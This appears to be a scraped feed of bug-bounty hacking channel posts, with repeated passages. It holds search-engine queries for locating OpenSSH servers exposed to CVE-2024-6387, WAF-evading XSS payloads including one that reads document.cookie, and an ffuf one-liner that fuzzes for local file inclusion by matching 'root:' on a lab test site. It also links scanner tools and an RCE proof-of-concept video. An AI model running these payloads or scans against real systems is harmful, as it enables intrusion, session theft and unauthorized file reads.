🚨Alert🚨CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server
⚠The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated RCE as root on glibc-based Linux systems; that presents a significant security risk.
👇Query
Hunter: /product.name="OpenSSH"
FOFA: app="OpenSSH"
SHODAN: product:"OpenSSH"
⚠The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated RCE as root on glibc-based Linux systems; that presents a significant security risk.
👇Query
Hunter: /product.name="OpenSSH"
FOFA: app="OpenSSH"
SHODAN: product:"OpenSSH"
🤮3❤1
❤4👏4🤣3👍1💩1
haxshadow
https://youtu.be/EUBhZOFAcxA
XSS Payload
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><img src=x onerror=confirm(document.cookie)>
<sVg/onLy=1 onLoaD=confirm(1)//
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><img src=x onerror=confirm(document.cookie)>
<sVg/onLy=1 onLoaD=confirm(1)//
try this amazingg xss scanner made by our brother sarper its so fast bcz of new method it can scan 1k urls in just 5-20 sec with 99% success rate it scan urls with xss polyglots payloads and run on all urls parameters just put all urls in wordlist file ones you get hit just open that link directly and xss popup show ❤️
https://github.com/sarperavci/MXS
https://github.com/sarperavci/MXS
👍2❤1
try this tool to find broken linkHijacking thanx to nafeed to sharing me https://github.com/H4cker-Nafeed/Nafeed-Broken-Link
GitHub
GitHub - H4cker-Nafeed/Nafeed-Broken-Link: Nafeed-Broken-Link: A Python tool designed to check for broken social media links on…
Nafeed-Broken-Link: A Python tool designed to check for broken social media links on a given domain. This script crawls all accessible pages of a specified domain and identifies social media links,...
👍1
try this xss pollyglots to bypass waf it will sure help you just use it manully+oneliner commands https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
GitHub
Unleashing an Ultimate XSS Polyglot
A container repository for my public web hacks! Contribute to 0xSobky/HackVault development by creating an account on GitHub.
👍1
try this amazingg auto scanner made by our brother..
https://github.com/wapiti-scanner/wapiti
https://github.com/wapiti-scanner/wapiti
try this amazingg LFI oneliner its veryfast and effective also change ffuf useragent so its dont get blocked by waf's
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | tee testphp.vulnweb.com.lfi.txt
cat testphp.vulnweb.com.lfi.txt | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | tee testphp.vulnweb.com.lfi.txt
cat testphp.vulnweb.com.lfi.txt | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
👍3
remote code execution | CVE-2024-7954 | bug-bounty poc
https://youtu.be/P9QxmY1gS3g?si=ECP1ACaUu8bUbCbA
https://youtu.be/P9QxmY1gS3g?si=ECP1ACaUu8bUbCbA
YouTube
remote code execution | CVE-2024-7954 | bug bounty poc
#bugbountypoc #rce
CVE-2024-7954 | remote code execution | bug-bounty poc
// Disclaimer //
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing…
CVE-2024-7954 | remote code execution | bug-bounty poc
// Disclaimer //
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing…
👍2